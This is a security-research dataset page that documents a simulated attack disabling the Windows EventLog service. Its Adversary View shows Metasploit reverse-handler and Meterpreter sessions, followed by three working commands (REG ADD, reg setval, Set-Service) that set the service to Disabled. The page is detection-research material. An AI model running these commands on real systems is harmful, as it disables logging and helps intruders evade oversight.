Stopping Event Log Service via Modification of Start Up Type
Contents
Stopping Event Log Service via Modification of Start Up Type#
Metadata#
Contributors |
Jose Rodriguez @Cyb3rPandaH |
Creation Date |
2022/07/08 |
Modification Date |
2022/08/04 |
Tactics |
|
Techniques |
|
Tags |
powershell,reg,cmd,eventlog |
Dataset Description#
After getting a shell with elevated privileges on the target, we modified the start up type for the EventLog service to Disabled. After the modification, we need to restart our system to make the EventLog service unavailable (Disabled). This data set contains only before-reboot data of our simulation. Even though after-reboot data is not part of the dataset, our attempt to disable the EventLog service was successful during the simulation. We have simulated this attack using 3 different procedures REG command via cmd.exe, REG meterpreter command (Metasploit), and the PowerShell module (Metasploit). This dataset was generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).
Datasets Downloads#
Type |
Link |
|---|---|
Host |
|
Host |
|
Host |
Adversary View#
**** Using reg command via cmd.exe:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: jhdxsqpv) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 20 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:20:26 -0400
meterpreter > shell
Process 7728 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\IT01-Pedro\Downloads>REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog /t REG_DWORD /v Start /d 4
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog /t REG_DWORD /v Start /d 4
Value Start exists, overwrite(Yes/No)? yes
The operation completed successfully.
C:\Users\IT01-Pedro\Downloads>
**** Using reg meterpreter command:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: r64afjpx) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 19 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 10:50:58 -0400
meterpreter > reg setval -k 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog' -v 'Start' -t 'REG_DWORD' -d 4
Successfully set Start of REG_DWORD.
meterpreter >
**** Using PowerShell module:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: bgwdtwdi) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 21 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:36:38 -0400
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute "Set-Service -Name EventLog -StartUpType Disabled"
[+] Command execution completed:
meterpreter >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_disable_eventlog_service_startuptype_modification.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)